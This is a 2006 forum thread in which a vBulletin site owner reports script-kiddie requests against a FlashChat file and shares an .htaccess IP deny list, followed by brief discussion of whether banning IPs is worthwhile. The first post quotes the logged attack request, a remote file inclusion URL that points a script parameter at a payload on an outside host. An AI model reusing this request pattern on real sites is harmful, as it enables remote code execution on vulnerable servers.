Hack Attempt

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Spikeman
    New Member
    • Aug 2006
    • 21
    • 3.6.x

    Hack Attempt

    Well it looked like the script kiddies came to visit my site, looked at who is online and had 29 different ip addressess going after this http://www.******.co.uk/forums/inc/c...ng4CMS.php?dir[inc]=http://www.ismailyk.gen.tr/lol1.txt?

    I know its a flashchat file, plus they were using the wrong directory for me, they could not get in anyway, so I managed to capture some IP's and threw them into .htaccess here they are if anyone wants to add
    Code:
    order allow,deny
    deny from 80.96.181.36
    deny from 216.185.128.200
    deny from 64.247.42.5
    deny from 200.80.42.139
    deny from 70.85.88.196
    deny from 66.29.43.180
    deny from 80.228.195.90
    deny from 212.227.109.185
    deny from 66.109.28.198
    deny from 62.75.204.148
    deny from 209.200.229.10
    deny from 210.193.49.174
    deny from 70.86.21.194
    deny from 212.10.24.130
    deny from 210.193.49.174    
    deny from 193.189.149.146
    deny from 209.59.161.56
    deny from 200.80.42.139
    deny from 217.160.226.28
    deny from 87.233.133.137
    deny from 62.141.52.99
    deny from 64.118.85.5
    deny from 202.83.173.216
    deny from 208.65.61.7
    deny from 157.22.20.82
    deny from 70.47.36.28
    deny from 210.193.49.174
    deny from 209.200.229.10
    deny from 67.43.12.2
    deny from 66.109.28.198
    allow from all
    Its only a heads up for anyone interested.
    Last edited by Spikeman; Wed 15 Nov '06, 1:56am. Reason: removed googlebot :)
    iPhone Beta Tester
  • TheBigCat
    New Member
    • Nov 2006
    • 4
    • 3.6.x

    #2
    Thanks for the list. I checked against my sites record, no matches.

    BTW, the hosts for those IPs are all over the place, but I'd say at a guess that your pal is in the Land Of Leiderhosen, as the largest number of hostnames had .de at the end.

    The last one I think you might have included erroniously. crawl-66-249-66-176.googlebot.com. either that or they are hijacking googlebots.

    Comment

    • Spikeman
      New Member
      • Aug 2006
      • 21
      • 3.6.x

      #3
      You are right, the googlebot got stuck in the middle, removed it from list I dare say they will be back with more kids with scripts, guess they were trying the old flashchat exploit. I shall wait for round 2.
      iPhone Beta Tester

      Comment

      • Scott MacVicar
        Former vBulletin Developer
        • Dec 2000
        • 13286

        #4
        I see very little point in banning these users, I suspect its going to slow down your board more in the end if you have a few hundred IP addresses getting checked on every page view.

        If anything they should just be ignored.
        Scott MacVicar

        My Blog | Twitter

        Comment

        • Spikeman
          New Member
          • Aug 2006
          • 21
          • 3.6.x

          #5
          Well I shall leave the banned users file in for about a week and hopefully they will have moved on to someone else, maybe it will slow it down a little, but I am sure that having 29 users hit my site at exactly the same time running the scripts that they were would have more impact than checking the .htaccess

          I always clear out all banned IP's out of vB and .htaccess every month, do not see any point in having them in there long term, if there are persistant offenders I speak to the isp
          iPhone Beta Tester

          Comment

          • Scott MacVicar
            Former vBulletin Developer
            • Dec 2000
            • 13286

            #6
            A week is probably enough, I suspect most of them are just bots owned by some script kiddies.

            Glad you dont leave them permanently like some people.
            Scott MacVicar

            My Blog | Twitter

            Comment

            widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
            Working...